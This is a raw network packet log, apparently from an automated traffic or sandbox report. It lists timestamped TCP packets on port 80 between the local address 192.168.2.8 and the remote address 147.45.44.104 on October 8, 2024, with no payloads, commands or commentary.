                                                                              Oct 8, 2024 03:23:04.762134075 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.762141943 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.762157917 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.762171030 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.762207985 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.762253046 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.762279987 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.762291908 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.762310028 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.762332916 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.762888908 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.762902021 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.762912035 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.762963057 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.762990952 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.762995958 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.763008118 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.763027906 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.763040066 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.763070107 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.763104916 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.763737917 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.763794899 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.763940096 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.763998032 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.764010906 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.764053106 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.851979971 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.852005005 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.852015018 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.852062941 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.852072001 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.852099895 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.852158070 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.852575064 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.852586985 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.852606058 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.852622032 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.852632999 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.852633953 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.852658987 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.852684975 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.852701902 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.852719069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.852760077 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.853209019 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.853236914 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.853247881 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.853291035 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.853312016 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.853322983 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.853346109 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.853355885 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.853357077 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.853379965 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.854234934 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854279995 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.854307890 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854393959 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854433060 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854444027 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854475021 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.854495049 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854505062 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854507923 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.854523897 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854546070 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.854595900 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854607105 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854623079 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854645967 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.854661942 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854674101 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854677916 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.854691982 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854718924 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.855267048 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855317116 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.855335951 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855381012 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855407000 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855438948 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855446100 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.855457067 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855473042 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855484962 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.855525970 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.856412888 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856435061 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856447935 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856493950 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.856529951 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856539965 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856558084 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856568098 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856584072 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856589079 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.856610060 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.856633902 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.856643915 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856653929 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856700897 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.857108116 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857187986 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857316017 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857362986 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.857428074 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857438087 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857459068 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857470036 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857477903 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.857491016 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857502937 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.857527018 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.857558966 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857570887 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857588053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857599020 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857614040 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.857619047 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857656002 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858127117 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858200073 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858221054 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858232021 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858251095 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858261108 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858275890 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858279943 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858294010 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858308077 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858319998 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858340025 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858347893 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858381987 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858396053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858409882 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858422995 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858458042 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858478069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858481884 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858505011 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858505964 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858545065 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858586073 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858597994 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858614922 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858627081 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858639002 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858688116 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.894501925 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.894515991 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.894587040 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.939213037 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.939229012 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.939248085 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.939312935 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942516088 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942549944 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942560911 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942619085 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942630053 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942631006 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942655087 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942666054 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942682981 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942723989 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942750931 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942751884 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942795038 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942804098 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942857027 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942912102 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942966938 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942982912 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942992926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943022013 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943032026 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943054914 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943054914 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.943064928 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943109989 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943110943 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.943125963 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943136930 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.943146944 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943156958 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943176031 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.943197966 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.943260908 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943332911 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943346977 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943356991 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943403006 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943406105 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.943414927 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943433046 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943454027 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.944112062 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944120884 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944139004 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944163084 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.944190025 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944200993 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944201946 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.944220066 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944231033 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944243908 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.944247961 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944272995 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944278002 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.944284916 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944302082 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944328070 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944329977 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.944364071 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.944369078 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.944413900 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.945291996 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945302963 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945341110 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.945415020 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945425987 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945446968 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945467949 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.945596933 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945640087 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.945647001 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945660114 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945678949 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945720911 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.945769072 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945790052 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945800066 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945813894 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.945816994 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945832014 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945848942 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945858002 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945858002 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.945878029 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945888042 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945905924 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945907116 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.945918083 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.945929050 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.945964098 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.946129084 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946158886 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946171045 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946197987 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.946237087 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946249008 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946265936 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946279049 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946285009 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.946297884 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946312904 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946322918 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.946347952 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.946351051 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946362972 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946379900 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946391106 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.946403027 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.946428061 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.947042942 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947053909 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947073936 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947099924 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.947122097 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947133064 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.947134018 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947153091 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947171926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947182894 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.947184086 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947206020 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947221041 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947222948 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.947231054 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947247982 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947252035 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.947263002 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947284937 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.947309017 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947309017 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.947320938 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947336912 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947357893 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.947742939 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947784901 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.947786093 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947798014 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947815895 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947829008 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.947843075 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.947871923 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.948045015 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948056936 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948076963 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948124886 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.948147058 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948168039 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948182106 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948189020 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.948195934 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948235989 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.948240042 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948251009 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948273897 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948283911 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948302984 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948306084 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.948333025 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948343992 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948344946 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.948364019 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948373079 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.948406935 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.948441029 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.948574066 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.949028969 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.949040890 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.949060917 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.949074030 CEST8049706147.45.44.104192.168.2.8
